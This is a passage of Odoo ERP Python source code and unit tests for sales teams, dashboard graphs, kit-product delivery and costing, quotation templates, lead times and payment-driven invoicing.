if not self.env.user.has_group('sales_team.group_sale_salesman_all_leads'):
raise AccessError(_("Do not have access, skip this data for user's digest email"))
for record in self:
start, end, company = record._get_kpi_compute_parameters()
all_channels_sales = self.env['sale.report'].read_group([
('confirmation_date', '>=', start),
('confirmation_date', '<', end),
('company_id', '=', company.id)], ['price_total'], ['price_total'])
record.kpi_all_sale_total_value = sum([channel_sale['price_total'] for channel_sale in all_channels_sales])
def compute_kpis_actions(self, company, user):
res = super(Digest, self).compute_kpis_actions(company, user)
res['kpi_all_sale_total'] = 'sale.report_all_channels_sales_action&menu_id=%s' % self.env.ref('sale.sale_menu_root').id
return res
```
#### File: sale/models/sales_team.py
```python
from datetime import date
from odoo import api, fields, models, _
class CrmTeam(models.Model):
_inherit = 'crm.team'
use_quotations = fields.Boolean(string='Quotations', help="Check this box if you send quotations to your customers rather than confirming orders straight away. "
"This will add specific action buttons to your dashboard.")
use_invoices = fields.Boolean('Set Invoicing Target', help="Check this box to set an invoicing target for this Sales Team.")
invoiced = fields.Integer(
compute='_compute_invoiced',
string='Invoiced This Month', readonly=True,
help="Invoice revenue for the current month. This is the amount the sales "
"channel has invoiced this month. It is used to compute the progression ratio "
"of the current and target revenue on the kanban view.")
invoiced_target = fields.Integer(
string='Invoicing Target',
help="Target of invoice revenue for the current month. This is the amount the sales "
"channel estimates to be able to invoice this month.")
quotations_count = fields.Integer(
compute='_compute_quotations_to_invoice',
string='Number of quotations to invoice', readonly=True)
quotations_amount = fields.Integer(
compute='_compute_quotations_to_invoice',
string='Amount of quotations to invoice', readonly=True)
sales_to_invoice_count = fields.Integer(
compute='_compute_sales_to_invoice',
string='Number of sales to invoice', readonly=True)
dashboard_graph_model = fields.Selection(selection_add=[
('sale.report', 'Sales'),
('account.invoice.report', 'Invoices'),
])
def _compute_quotations_to_invoice(self):
non_website_teams = self.filtered(lambda team: team.team_type != 'website')
if non_website_teams:
query = self.env['sale.order']._where_calc([
('team_id', 'in', non_website_teams.ids),
('state', 'in', ['draft', 'sent']),
])
self.env['sale.order']._apply_ir_rules(query, 'read')
_, where_clause, where_clause_args = query.get_sql()
select_query = """
SELECT team_id, count(*), sum(amount_total /
CASE COALESCE(currency_rate, 0)
WHEN 0 THEN 1.0
ELSE currency_rate
END
) as amount_total
FROM sale_order
WHERE %s
GROUP BY team_id
""" % where_clause
self.env.cr.execute(select_query, where_clause_args)
quotation_data = self.env.cr.dictfetchall()
for datum in quotation_data:
self.browse(datum['team_id']).quotations_amount = datum['amount_total']
self.browse(datum['team_id']).quotations_count = datum['count']
@api.multi
def _compute_sales_to_invoice(self):
sale_order_data = self.env['sale.order'].read_group([
('team_id', 'in', self.ids),
('invoice_status','=','to invoice'),
], ['team_id'], ['team_id'])
for datum in sale_order_data:
self.browse(datum['team_id'][0]).sales_to_invoice_count = datum['team_id_count']
@api.multi
def _compute_invoiced(self):
invoice_data = self.env['account.invoice'].read_group([
('state', 'in', ['open', 'in_payment', 'paid']),
('team_id', 'in', self.ids),
('date', '<=', date.today()),
('date', '>=', date.today().replace(day=1)),
('type', 'in', ['out_invoice', 'out_refund']),
], ['amount_untaxed_signed', 'team_id'], ['team_id'])
for datum in invoice_data:
self.browse(datum['team_id'][0]).invoiced = datum['amount_untaxed_signed']
def _graph_date_column(self):
if self.dashboard_graph_model == 'sale.report':
return 'confirmation_date'
elif self.dashboard_graph_model == 'account.invoice.report':
return 'date'
return super(CrmTeam, self)._graph_date_column()
def _graph_y_query(self):
if self.dashboard_graph_model == 'sale.report':
return 'SUM(price_subtotal)'
elif self.dashboard_graph_model == 'account.invoice.report':
return 'SUM(price_total)'
return super(CrmTeam, self)._graph_y_query()
def _extra_sql_conditions(self):
if self.dashboard_graph_model == 'sale.report':
return "AND state in ('sale', 'done')"
elif self.dashboard_graph_model == 'account.invoice.report':
return "AND state in ('open', 'in_payment', 'paid')"
return super(CrmTeam, self)._extra_sql_conditions()
def _graph_title_and_key(self):
if self.dashboard_graph_model == 'sale.report':
return ['', _('Sales: Untaxed Total')] # no more title
elif self.dashboard_graph_model == 'account.invoice.report':
return ['', _('Invoices: Untaxed Total')]
return super(CrmTeam, self)._graph_title_and_key()
def _compute_dashboard_button_name(self):
quotation_teams = self.filtered('use_quotations')
quotation_teams.update({'dashboard_button_name': _("Quotations")})
(self - quotation_teams).update({'dashboard_button_name': _("Sales Orders")})
def action_primary_channel_button(self):
if hasattr(self, 'use_opportunities') and self.use_opportunities:
return super(CrmTeam, self).action_primary_channel_button()
elif self.use_quotations:
action = self.env.ref('sale.action_quotations_salesteams').read()[0]
action['context'] = {'search_default_team_id': self.id}
return action
else:
action = self.env.ref('sale.action_orders_salesteams').read()[0]
action['context'] = {'search_default_team_id': self.id}
return action
@api.onchange('team_type')
def _onchange_team_type(self):
if self.team_type == 'sales':
self.use_quotations = True
self.use_invoices = True
if not self.dashboard_graph_model:
self.dashboard_graph_model = 'sale.report'
else:
self.use_quotations = False
self.use_invoices = False
self.dashboard_graph_model = 'sale.report'
return super(CrmTeam, self)._onchange_team_type()
@api.multi
def update_invoiced_target(self, value):
return self.write({'invoiced_target': round(float(value or 0))})
```
#### File: sale_mrp/models/sale_mrp.py
```python
from odoo import api, fields, models
from odoo.tools import float_compare
class SaleOrderLine(models.Model):
_inherit = 'sale.order.line'
@api.multi
def _compute_qty_delivered(self):
super(SaleOrderLine, self)._compute_qty_delivered()
for line in self:
if line.qty_delivered_method == 'stock_move':
# In the case of a kit, we need to check if all components are shipped. Since the BOM might
# have changed, we don't compute the quantities but verify the move state.
bom = self.env['mrp.bom']._bom_find(product=line.product_id, company_id=line.company_id.id)
if bom and bom.type == 'phantom':
moves = line.move_ids.filtered(lambda m: m.picking_id and m.picking_id.state != 'cancel')
bom_delivered = moves and all([move.state == 'done' for move in moves])
if bom_delivered:
line.qty_delivered = line.product_uom_qty
else:
line.qty_delivered = 0.0
@api.multi
def _get_bom_component_qty(self, bom):
bom_quantity = self.product_uom._compute_quantity(1, bom.product_uom_id)
boms, lines = bom.explode(self.product_id, bom_quantity)
components = {}
for line, line_data in lines:
product = line.product_id.id
uom = line.product_uom_id
qty = line.product_qty
if components.get(product, False):
if uom.id != components[product]['uom']:
from_uom = uom
to_uom = self.env['uom.uom'].browse(components[product]['uom'])
qty = from_uom._compute_quantity(qty, to_uom)
components[product]['qty'] += qty
else:
# To be in the uom reference of the product
to_uom = self.env['product.product'].browse(product).uom_id
if uom.id != to_uom.id:
from_uom = uom
qty = from_uom._compute_quantity(qty, to_uom)
components[product] = {'qty': qty, 'uom': to_uom.id}
return components
def _get_qty_procurement(self):
self.ensure_one()
# Specific case when we change the qty on a SO for a kit product.
# We don't try to be too smart and keep a simple approach: we compare the quantity before
# and after update, and return the difference. We don't take into account what was already
# sent, or any other exceptional case.
bom = self.env['mrp.bom']._bom_find(product=self.product_id)
if bom and bom.type == 'phantom' and 'previous_product_uom_qty' in self.env.context:
return self.env.context['previous_product_uom_qty'].get(self.id, 0.0)
return super(SaleOrderLine, self)._get_qty_procurement()
@api.multi
@api.depends('product_id', 'move_ids.state')
def _compute_qty_delivered_method(self):
lines = self.env['sale.order.line']
for line in self:
bom = self.env['mrp.bom']._bom_find(product=line.product_id, company_id=line.company_id.id)
if bom and bom.type == 'phantom' and line.order_id.state == 'sale':
bom_delivered = all([move.state == 'done' for move in line.move_ids])
if not bom_delivered:
line.qty_delivered_method = 'manual'
lines |= line
super(SaleOrderLine, self - lines)._compute_qty_delivered_method()
class AccountInvoiceLine(models.Model):
# TDE FIXME: what is this code ??
_inherit = "account.invoice.line"
def _get_anglo_saxon_price_unit(self):
price_unit = super(AccountInvoiceLine, self)._get_anglo_saxon_price_unit()
# in case of anglo saxon with a product configured as invoiced based on delivery, with perpetual
# valuation and real price costing method, we must find the real price for the cost of good sold
if self.product_id.invoice_policy == "delivery":
for s_line in self.sale_line_ids:
# qtys already invoiced
qty_done = sum([x.uom_id._compute_quantity(x.quantity, x.product_id.uom_id) for x in s_line.invoice_lines if x.invoice_id.state in ('open', 'in_payment', 'paid')])
quantity = self.uom_id._compute_quantity(self.quantity, self.product_id.uom_id)
# Put moves in fixed order by date executed
moves = s_line.move_ids.sorted(lambda x: x.date)
# Go through all the moves and do nothing until you get to qty_done
# Beyond qty_done we need to calculate the average of the price_unit
# on the moves we encounter.
bom = s_line.product_id.product_tmpl_id.bom_ids and s_line.product_id.product_tmpl_id.bom_ids[0]
if bom.type == 'phantom':
average_price_unit = 0
components = s_line._get_bom_component_qty(bom)
for product_id in components:
factor = components[product_id]['qty']
prod_moves = [m for m in moves if m.product_id.id == product_id]
prod_qty_done = factor * qty_done
prod_quantity = factor * quantity
average_price_unit += factor * self._compute_average_price(prod_qty_done, prod_quantity, prod_moves)
price_unit = average_price_unit or price_unit
price_unit = self.product_id.uom_id._compute_price(price_unit, self.uom_id)
return price_unit
```
#### File: sale_mrp/tests/test_sale_mrp_procurement.py
```python
import time
from odoo.tests.common import TransactionCase, Form
from odoo.tools import mute_logger
class TestSaleMrpProcurement(TransactionCase):
def test_sale_mrp(self):
warehouse0 = self.env.ref('stock.warehouse0')
# In order to test the sale_mrp module in OpenERP, I start by creating a new product 'Slider Mobile'
# I define product category Mobile Products Sellable.
with mute_logger('odoo.tests.common.onchange'):
# Suppress warning on "Changing your cost method" when creating a
# product category
pc = Form(self.env['product.category'])
pc.name = 'Mobile Products Sellable'
product_category_allproductssellable0 = pc.save()
uom_unit = self.env.ref('uom.product_uom_unit')
self.assertIn("seller_ids", self.env['product.template'].fields_get())
# I define product for Slider Mobile.
product = Form(self.env['product.template'])
product.categ_id = product_category_allproductssellable0
product.list_price = 200.0
product.name = 'Slider Mobile'
product.standard_price = 189.0
product.type = 'product'
product.uom_id = uom_unit
product.uom_po_id = uom_unit
product.route_ids.clear()
product.route_ids.add(warehouse0.manufacture_pull_id.route_id)
product.route_ids.add(warehouse0.mto_pull_id.route_id)
product_template_slidermobile0 = product.save()
with Form(self.env['mrp.bom']) as bom:
bom.product_tmpl_id = product_template_slidermobile0
# I create a sale order for product Slider mobile
so_form = Form(self.env['sale.order'])
so_form.partner_id = self.env.ref('base.res_partner_4')
with so_form.order_line.new() as line:
line.product_id = product_template_slidermobile0.product_variant_ids
line.price_unit = 200
line.product_uom_qty = 500.0
line.customer_lead = 7.0
sale_order_so0 = so_form.save()
# I confirm the sale order
sale_order_so0.action_confirm()
# I verify that a manufacturing order has been generated, and that its name and reference are correct
mo = self.env['mrp.production'].search([('origin', 'like', sale_order_so0.name)], limit=1)
self.assertTrue(mo, 'Manufacturing order has not been generated')
def test_sale_mrp_pickings(self):
""" Test sale of multiple mrp products in MTO
to avoid generating multiple deliveries
to the customer location
"""
# Create warehouse
self.customer_location = self.env['ir.model.data'].xmlid_to_res_id('stock.stock_location_customers')
warehouse_form = Form(self.env['stock.warehouse'])
warehouse_form.name = 'Test Warehouse'
warehouse_form.code = 'TWH'
self.warehouse = warehouse_form.save()
self.uom_unit = self.env.ref('uom.product_uom_unit')
# Create raw product for manufactured product
product_form = Form(self.env['product.product'])
product_form.name = 'Raw Stick'
product_form.type = 'product'
product_form.uom_id = self.uom_unit
product_form.uom_po_id = self.uom_unit
self.raw_product = product_form.save()
# Create manufactured product
product_form = Form(self.env['product.product'])
product_form.name = 'Stick'
product_form.uom_id = self.uom_unit
product_form.uom_po_id = self.uom_unit
product_form.type = 'product'
product_form.route_ids.clear()
product_form.route_ids.add(self.warehouse.manufacture_pull_id.route_id)
product_form.route_ids.add(self.warehouse.mto_pull_id.route_id)
self.finished_product = product_form.save()
# Create manifactured product which uses another manifactured
product_form = Form(self.env['product.product'])
product_form.name = 'Arrow'
product_form.type = 'product'
product_form.route_ids.clear()
product_form.route_ids.add(self.warehouse.manufacture_pull_id.route_id)
product_form.route_ids.add(self.warehouse.mto_pull_id.route_id)
self.complex_product = product_form.save()
## Create raw product for manufactured product
product_form = Form(self.env['product.product'])
product_form.name = 'Raw Iron'
product_form.type = 'product'
product_form.uom_id = self.uom_unit
product_form.uom_po_id = self.uom_unit
self.raw_product_2 = product_form.save()
# Create bom for manufactured product
bom_product_form = Form(self.env['mrp.bom'])
bom_product_form.product_id = self.finished_product
bom_product_form.product_tmpl_id = self.finished_product.product_tmpl_id
bom_product_form.product_qty = 1.0
bom_product_form.type = 'normal'
with bom_product_form.bom_line_ids.new() as bom_line:
bom_line.product_id = self.raw_product
bom_line.product_qty = 2.0
self.bom = bom_product_form.save()
## Create bom for manufactured product
bom_product_form = Form(self.env['mrp.bom'])
bom_product_form.product_id = self.complex_product
bom_product_form.product_tmpl_id = self.complex_product.product_tmpl_id
with bom_product_form.bom_line_ids.new() as line:
line.product_id = self.finished_product
line.product_qty = 1.0
with bom_product_form.bom_line_ids.new() as line:
line.product_id = self.raw_product_2
line.product_qty = 1.0
self.complex_bom = bom_product_form.save()
with Form(self.warehouse) as warehouse:
warehouse.manufacture_steps = 'pbm_sam'
so_form = Form(self.env['sale.order'])
so_form.partner_id = self.env.ref('base.res_partner_4')
with so_form.order_line.new() as line:
line.product_id = self.complex_product
line.price_unit = 1
line.product_uom_qty = 1
with so_form.order_line.new() as line:
line.product_id = self.finished_product
line.price_unit = 1
line.product_uom_qty = 1
sale_order_so0 = so_form.save()
sale_order_so0.action_confirm()
pickings = sale_order_so0.picking_ids
# One delivery...
self.assertEqual(len(pickings), 1)
# ...with two products
move_lines = pickings[0].move_lines
self.assertEqual(len(move_lines), 2)
```
#### File: sale_quotation_builder/controllers/portal.py
```python
from odoo import http
from odoo.http import request
from odoo.addons.portal.controllers.portal import CustomerPortal
class CustomerPortal(CustomerPortal):
@http.route(["/sale_quotation_builder/template/<model('sale.order.template'):template>"], type='http', auth="user", website=True)
def sale_quotation_builder_template_view(self, template, **post):
values = {'template': template}
return request.render('sale_quotation_builder.so_template', values)
```
#### File: sales_team/models/crm_team.py
```python
from babel.dates import format_date
from datetime import date, datetime
from dateutil.relativedelta import relativedelta
import json
from odoo import api, fields, models, _
from odoo.exceptions import AccessError, UserError
from odoo.release import version
from odoo.tools import DEFAULT_SERVER_DATE_FORMAT as DF
class CrmTeam(models.Model):
_name = "crm.team"
_inherit = ['mail.thread']
_description = "Sales Team"
_order = "name"
@api.model
@api.returns('self', lambda value: value.id if value else False)
def _get_default_team_id(self, user_id=None):
if not user_id:
user_id = self.env.uid
company_id = self.sudo(user_id).env.user.company_id.id
team_id = self.env['crm.team'].sudo().search([
'|', ('user_id', '=', user_id), ('member_ids', '=', user_id),
'|', ('company_id', '=', False), ('company_id', 'child_of', [company_id])
], limit=1)
if not team_id and 'default_team_id' in self.env.context:
team_id = self.env['crm.team'].browse(self.env.context.get('default_team_id'))
if not team_id:
default_team_id = self.env.ref('sales_team.team_sales_department', raise_if_not_found=False)
if default_team_id:
try:
default_team_id.check_access_rule('read')
except AccessError:
return self.env['crm.team']
if (self.env.context.get('default_type') != 'lead' or default_team_id.use_leads) and default_team_id.active:
team_id = default_team_id
return team_id
def _get_default_favorite_user_ids(self):
return [(6, 0, [self.env.uid])]
name = fields.Char('Sales Team', required=True, translate=True)
active = fields.Boolean(default=True, help="If the active field is set to false, it will allow you to hide the Sales Team without removing it.")
company_id = fields.Many2one('res.company', string='Company',
default=lambda self: self.env['res.company']._company_default_get('crm.team'))
currency_id = fields.Many2one(
"res.currency", related='company_id.currency_id',
string="Currency", readonly=True)
user_id = fields.Many2one('res.users', string='Team Leader')
member_ids = fields.One2many('res.users', 'sale_team_id', string='Channel Members')
favorite_user_ids = fields.Many2many(
'res.users', 'team_favorite_user_rel', 'team_id', 'user_id',
string='Favorite Members',
default=_get_default_favorite_user_ids)
is_favorite = fields.Boolean(
string='Show on dashboard',
compute='_compute_is_favorite', inverse='_inverse_is_favorite',
help="Favorite teams to display them in the dashboard and access them easily.")
reply_to = fields.Char(string='Reply-To',
help="The email address put in the 'Reply-To' of all emails sent by Odoo about cases in this Sales Team")
color = fields.Integer(string='Color Index', help="The color of the channel")
team_type = fields.Selection([('sales', 'Sales'), ('website', 'Website')], string='Team Type', default='sales', required=True,
help="The type of this channel, it will define the resources this channel uses.")
dashboard_button_name = fields.Char(string="Dashboard Button", compute='_compute_dashboard_button_name')
dashboard_graph_data = fields.Text(compute='_compute_dashboard_graph')
dashboard_graph_type = fields.Selection([
('line', 'Line'),
('bar', 'Bar'),
], string='Type', compute='_compute_dashboard_graph', help='The type of graph this channel will display in the dashboard.')
dashboard_graph_model = fields.Selection([], string="Content", help='The graph this channel will display in the Dashboard.\n')
dashboard_graph_group = fields.Selection([
('day', 'Day'),
('week', 'Week'),
('month', 'Month'),
('user', 'Salesperson'),
], string='Group by', default='day', help="How this channel's dashboard graph will group the results.")
dashboard_graph_period = fields.Selection([
('week', 'Last Week'),
('month', 'Last Month'),
('year', 'Last Year'),
], string='Scale', default='month', help="The time period this channel's dashboard graph will consider.")
@api.depends('dashboard_graph_group', 'dashboard_graph_model', 'dashboard_graph_period')
def _compute_dashboard_graph(self):
for team in self.filtered('dashboard_graph_model'):
if team.dashboard_graph_group in (False, 'user') or team.dashboard_graph_period == 'week' and team.dashboard_graph_group != 'day' \
or team.dashboard_graph_period == 'month' and team.dashboard_graph_group != 'day':
team.dashboard_graph_type = 'bar'
else:
team.dashboard_graph_type = 'line'
team.dashboard_graph_data = json.dumps(team._get_graph())
def _compute_is_favorite(self):
for team in self:
team.is_favorite = self.env.user in team.favorite_user_ids
def _inverse_is_favorite(self):
sudoed_self = self.sudo()
to_fav = sudoed_self.filtered(lambda team: self.env.user not in team.favorite_user_ids)
to_fav.write({'favorite_user_ids': [(4, self.env.uid)]})
(sudoed_self - to_fav).write({'favorite_user_ids': [(3, self.env.uid)]})
return True
def _graph_get_dates(self, today):
""" return a coherent start and end date for the dashboard graph according to the graph settings.
"""
if self.dashboard_graph_period == 'week':
start_date = today - relativedelta(weeks=1)
elif self.dashboard_graph_period == 'year':
start_date = today - relativedelta(years=1)
else:
start_date = today - relativedelta(months=1)
# we take the start of the following month/week/day if we group by month/week/day
# (to avoid having twice the same month/week/day from different years/month/week)
if self.dashboard_graph_group == 'month':
start_date = date(start_date.year + start_date.month // 12, start_date.month % 12 + 1, 1)
# handle period=week, grouping=month for silly managers
if self.dashboard_graph_period == 'week':
start_date = today.replace(day=1)
elif self.dashboard_graph_group == 'week':
start_date += relativedelta(days=8 - start_date.isocalendar()[2])
# add a week to make sure no overlapping is possible in case of year period (will display max 52 weeks, avoid case of 53 weeks in a year)
if self.dashboard_graph_period == 'year':
start_date += relativedelta(weeks=1)
else:
start_date += relativedelta(days=1)
return [start_date, today]
def _graph_date_column(self):
return 'create_date'
def _graph_x_query(self):
if self.dashboard_graph_group == 'user':
return 'user_id'
elif self.dashboard_graph_group == 'week':
return 'EXTRACT(WEEK FROM %s)' % self._graph_date_column()
elif self.dashboard_graph_group == 'month':
return 'EXTRACT(MONTH FROM %s)' % self._graph_date_column()
else:
return 'DATE(%s)' % self._graph_date_column()
def _graph_y_query(self):
raise UserError(_('Undefined graph model for Sales Team: %s') % self.name)
def _extra_sql_conditions(self):
return ''
def _graph_title_and_key(self):
""" Returns an array containing the appropriate graph title and key respectively.
The key is for lineCharts, to have the on-hover label.
"""
return ['', '']
def _graph_data(self, start_date, end_date):
""" return format should be an iterable of dicts that contain {'x_value': ..., 'y_value': ...}
x_values should either be dates, weeks, months or user_ids depending on the self.dashboard_graph_group value.
y_values are floats.
"""
query = """SELECT %(x_query)s as x_value, %(y_query)s as y_value
FROM %(table)s
WHERE team_id = %(team_id)s
AND DATE(%(date_column)s) >= %(start_date)s
AND DATE(%(date_column)s) <= %(end_date)s
%(extra_conditions)s
GROUP BY x_value;"""
# apply rules
if not self.dashboard_graph_model:
raise UserError(_('Undefined graph model for Sales Team: %s') % self.name)
GraphModel = self.env[self.dashboard_graph_model]
graph_table = GraphModel._table
extra_conditions = self._extra_sql_conditions()
where_query = GraphModel._where_calc([])
GraphModel._apply_ir_rules(where_query, 'read')
from_clause, where_clause, where_clause_params = where_query.get_sql()
if where_clause:
extra_conditions += " AND " + where_clause
query = query % {
'x_query': self._graph_x_query(),
'y_query': self._graph_y_query(),
'table': graph_table,
'team_id': "%s",
'date_column': self._graph_date_column(),
'start_date': "%s",
'end_date': "%s",
'extra_conditions': extra_conditions
}
self._cr.execute(query, [self.id, start_date, end_date] + where_clause_params)
return self.env.cr.dictfetchall()
def _get_graph(self):
def get_week_name(start_date, locale):
""" Generates a week name (string) from a datetime according to the locale:
E.g.: locale start_date (datetime) return string
"en_US" November 16th "16-22 Nov"
"en_US" December 28th "28 Dec-3 Jan"
"""
if (start_date + relativedelta(days=6)).month == start_date.month:
short_name_from = format_date(start_date, 'd', locale=locale)
else:
short_name_from = format_date(start_date, 'd MMM', locale=locale)
short_name_to = format_date(start_date + relativedelta(days=6), 'd MMM', locale=locale)
return short_name_from + '-' + short_name_to
self.ensure_one()
values = []
today = fields.Date.from_string(fields.Date.context_today(self))
start_date, end_date = self._graph_get_dates(today)
graph_data = self._graph_data(start_date, end_date)
# line graphs and bar graphs require different labels
if self.dashboard_graph_type == 'line':
x_field = 'x'
y_field = 'y'
else:
x_field = 'label'
y_field = 'value'
# generate all required x_fields and update the y_values where we have data for them
locale = self._context.get('lang') or 'en_US'
if self.dashboard_graph_group == 'day':
for day in range(0, (end_date - start_date).days + 1):
short_name = format_date(start_date + relativedelta(days=day), 'd MMM', locale=locale)
values.append({x_field: short_name, y_field: 0})
for data_item in graph_data:
index = (data_item.get('x_value') - start_date).days
values[index][y_field] = data_item.get('y_value')
elif self.dashboard_graph_group == 'week':
weeks_in_start_year = int(date(start_date.year, 12, 28).isocalendar()[1]) # This date is always in the last week of ISO years
for week in range(0, (end_date.isocalendar()[1] - start_date.isocalendar()[1]) % weeks_in_start_year + 1):
short_name = get_week_name(start_date + relativedelta(days=7 * week), locale)
values.append({x_field: short_name, y_field: 0})
for data_item in graph_data:
index = int((data_item.get('x_value') - start_date.isocalendar()[1]) % weeks_in_start_year)
values[index][y_field] = data_item.get('y_value')
elif self.dashboard_graph_group == 'month':
for month in range(0, (end_date.month - start_date.month) % 12 + 1):
short_name = format_date(start_date + relativedelta(months=month), 'MMM', locale=locale)
values.append({x_field: short_name, y_field: 0})
for data_item in graph_data:
index = int((data_item.get('x_value') - start_date.month) % 12)
values[index][y_field] = data_item.get('y_value')
elif self.dashboard_graph_group == 'user':
for data_item in graph_data:
values.append({x_field: self.env['res.users'].browse(data_item.get('x_value')).name or _('Not Defined'), y_field: data_item.get('y_value')})
else:
for data_item in graph_data:
values.append({x_field: data_item.get('x_value'), y_field: data_item.get('y_value')})
[graph_title, graph_key] = self._graph_title_and_key()
color = '#875A7B' if '+e' in version else '#7c7bad'
return [{'values': values, 'area': True, 'title': graph_title, 'key': graph_key, 'color': color}]
def _compute_dashboard_button_name(self):
""" Sets the adequate dashboard button name depending on the Sales Team's options
"""
for team in self:
team.dashboard_button_name = _("Big Pretty Button :)") # placeholder
def action_primary_channel_button(self):
""" skeleton function to be overloaded
It will return the adequate action depending on the Sales Team's options
"""
return False
def _onchange_team_type(self):
""" skeleton function defined here because it'll be called by crm and/or sale
"""
self.ensure_one()
@api.model
def create(self, values):
team = super(CrmTeam, self.with_context(mail_create_nosubscribe=True)).create(values)
if values.get('member_ids'):
team._add_members_to_favorites()
return team
@api.multi
def write(self, values):
res = super(CrmTeam, self).write(values)
if values.get('member_ids'):
self._add_members_to_favorites()
return res
def _add_members_to_favorites(self):
for team in self:
team.favorite_user_ids = [(4, member.id) for member in team.member_ids]
```
#### File: sales_team/tests/test_default_team.py
```python
from odoo.tests import common
class TestDefaultTeam(common.SavepointCase):
"""Tests to check if correct default team is found."""
@classmethod
def setUpClass(cls):
"""Set up data for default team tests."""
super(TestDefaultTeam, cls).setUpClass()
cls.CrmTeam = cls.env['crm.team']
ResUsers = cls.env['res.users'].with_context(
{'no_reset_password': True})
group_sale_manager = cls.env.ref('sales_team.group_sale_manager')
cls.user = ResUsers.create({
'name': 'Team User',
'login': 'sales_team_user',
'email': '<EMAIL>',
'groups_id': [(6, 0, [group_sale_manager.id])]
})
cls.team_1 = cls.env['crm.team'].create({
'name': 'Test Team',
'member_ids': [(4, cls.user.id)],
'company_id': False
})
# Europe Team (fall back team)
cls.team_2 = cls.env.ref('sales_team.team_sales_department')
def test_01_user_team(self):
"""Get default team, when user belongs to one."""
team = self.CrmTeam.sudo(self.user)._get_default_team_id()
self.assertEqual(team, self.team_1)
def test_02_fallback_team(self):
"""Get default team when user does not belong to any team.
Case 1: fall back default team (from XML ref) is active.
Case 2: fall back default team is not active.
"""
# Clear users from team.
self.team_1.member_ids = [(5,)]
# Case 1.
team = self.CrmTeam.sudo(self.user)._get_default_team_id()
self.assertEqual(team, self.team_2)
# Case 2.
self.team_2.active = False
team = self.CrmTeam.sudo(self.user)._get_default_team_id()
self.assertEqual(team, self.CrmTeam)
```
#### File: sale_stock/tests/test_sale_stock_lead_time.py
```python
from datetime import timedelta
from odoo import fields
from odoo.addons.stock.tests.common2 import TestStockCommon
class TestSaleStockLeadTime(TestStockCommon):
def setUp(self):
super(TestSaleStockLeadTime, self).setUp()
# Update the product_1 with type and Customer Lead Time
self.product_1.write({'type': 'product',
'sale_delay': 5.0})
def test_00_product_company_level_delays(self):
""" In order to check schedule date, set product's Customer Lead Time
and company's Sales Safety Days."""
company = self.env.ref('base.main_company')
# Update company with Sales Safety Days
company.write({'security_lead': 3.00})
# Create sale order of product_1
order = self.env['sale.order'].create({
'partner_id': self.partner_1.id,
'partner_invoice_id': self.partner_1.id,
'partner_shipping_id': self.partner_1.id,
'pricelist_id': self.env.ref('product.list0').id,
'picking_policy': 'direct',
'warehouse_id': self.warehouse_1.id,
'order_line': [(0, 0, {'name': self.product_1.name,
'product_id': self.product_1.id,
'product_uom_qty': 10,
'product_uom': self.uom_unit.id,
'customer_lead': self.product_1.sale_delay})]})
# Confirm our standard sale order
order.action_confirm()
# Check the picking crated or not
self.assertTrue(order.picking_ids, "Picking should be created.")
# Check schedule date of picking
out_date = fields.Datetime.from_string(order.date_order) + timedelta(days=self.product_1.sale_delay) - timedelta(days=company.security_lead)
min_date = fields.Datetime.from_string(order.picking_ids[0].scheduled_date)
self.assertTrue(abs(min_date - out_date) <= timedelta(seconds=1), 'Schedule date of picking should be equal to: order date + Customer Lead Time - Sales Safety Days.')
def test_01_product_route_level_delays(self):
""" In order to check schedule dates, set product's Customer Lead Time
and warehouse route's delay."""
# Update warehouse_1 with Outgoing Shippings pick + pack + ship
self.warehouse_1.write({'delivery_steps': 'pick_pack_ship'})
# Set delay on pull rule
for pull_rule in self.warehouse_1.delivery_route_id.rule_ids:
pull_rule.write({'delay': 2})
# Create sale order of product_1
order = self.env['sale.order'].create({
'partner_id': self.partner_1.id,
'partner_invoice_id': self.partner_1.id,
'partner_shipping_id': self.partner_1.id,
'pricelist_id': self.env.ref('product.list0').id,
'picking_policy': 'direct',
'warehouse_id': self.warehouse_1.id,
'order_line': [(0, 0, {'name': self.product_1.name,
'product_id': self.product_1.id,
'product_uom_qty': 5,
'product_uom': self.uom_unit.id,
'customer_lead': self.product_1.sale_delay})]})
# Confirm our standard sale order
order.action_confirm()
# Check the picking crated or not
self.assertTrue(order.picking_ids, "Pickings should be created.")
# Check schedule date of ship type picking
out = order.picking_ids.filtered(lambda r: r.picking_type_id == self.warehouse_1.out_type_id)
out_min_date = fields.Datetime.from_string(out.scheduled_date)
out_date = fields.Datetime.from_string(order.date_order) + timedelta(days=self.product_1.sale_delay) - timedelta(days=out.move_lines[0].rule_id.delay)
self.assertTrue(abs(out_min_date - out_date) <= timedelta(seconds=1), 'Schedule date of ship type picking should be equal to: order date + Customer Lead Time - pull rule delay.')
# Check schedule date of pack type picking
pack = order.picking_ids.filtered(lambda r: r.picking_type_id == self.warehouse_1.pack_type_id)
pack_min_date = fields.Datetime.from_string(pack.scheduled_date)
pack_date = out_date - timedelta(days=pack.move_lines[0].rule_id.delay)
self.assertTrue(abs(pack_min_date - pack_date) <= timedelta(seconds=1), 'Schedule date of pack type picking should be equal to: Schedule date of ship type picking - pull rule delay.')
# Check schedule date of pick type picking
pick = order.picking_ids.filtered(lambda r: r.picking_type_id == self.warehouse_1.pick_type_id)
pick_min_date = fields.Datetime.from_string(pick.scheduled_date)
pick_date = pack_date - timedelta(days=pick.move_lines[0].rule_id.delay)
self.assertTrue(abs(pick_min_date - pick_date) <= timedelta(seconds=1), 'Schedule date of pick type picking should be equal to: Schedule date of pack type picking - pull rule delay.')
```
#### File: sale/tests/test_sale_transaction.py
```python
from odoo import tests
from odoo.addons.account.tests.account_test_classes import AccountingTestCase
@tests.tagged('post_install', '-at_install')
class TestSaleTransaction(AccountingTestCase):
def test_sale_invoicing_from_transaction(self):
''' Test the following scenario:
- Create a sale order
- Create a transaction for the sale order.
- Confirm the transaction but no invoice generated automatically.
- Create manually an invoice for this sale order.
=> The invoice must be paid.
'''
product = self.env['product.product'].create({
'name': 'Product A',
})
order = self.env['sale.order'].create({
'partner_id': self.env.ref('base.res_partner_1').id,
'order_line': [
(0, False, {
'product_id': product.id,
'name': '1 Product',
'price_unit': 100.0,
}),
],
})
transaction = order._create_payment_transaction({
'acquirer_id': self.env.ref('payment.payment_acquirer_transfer').id,
})
transaction._set_transaction_done()
transaction._post_process_after_done()
# Assert a posted payment has been generated at this point.
self.assertTrue(transaction.payment_id)
self.assertEqual(transaction.payment_id.state, 'posted')
invoice_ids = order.action_invoice_create()
invoice = self.env['account.invoice'].browse(invoice_ids)
invoice.action_invoice_open()
self.assertEqual(invoice.state, 'paid')
```
#### File: sms/wizard/send_sms.py
```python
import logging
from odoo import api, fields, models, _
from odoo.exceptions import UserError
from odoo.addons.iap.models import iap
